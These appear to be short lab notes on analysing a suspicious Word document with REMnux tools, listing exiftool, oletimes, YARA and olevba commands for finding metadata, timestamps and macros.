Perform a malware analysis on the provided file baddoc.doc using REMnux tools.

Identify Indicators of compromise (IOCs), suspicious macros and generate a short analysis report.

Password - Malware

unzip malware_office.zip

image.png

To extract meta-data

exiftool baddoc.doc

image.png

To extract time-stamps

oletimes baddoc.doc

image.png

Download YARA Rules (Community Rules)

git clone [<https://github.com/Yara-Rules/rules.git>](<https://github.com/Yara-Rules/rules.git>) community-rules

image.png

yara -w ~/community-rules/index.yar baddoc.doc

image.png

Commands:
oleid baddoc.doc
olevba -c baddoc.doc > baddoc.vba (Extract VBA Code to external file)
olevba --deobf --reveal baddoc.doc > baddoc.vba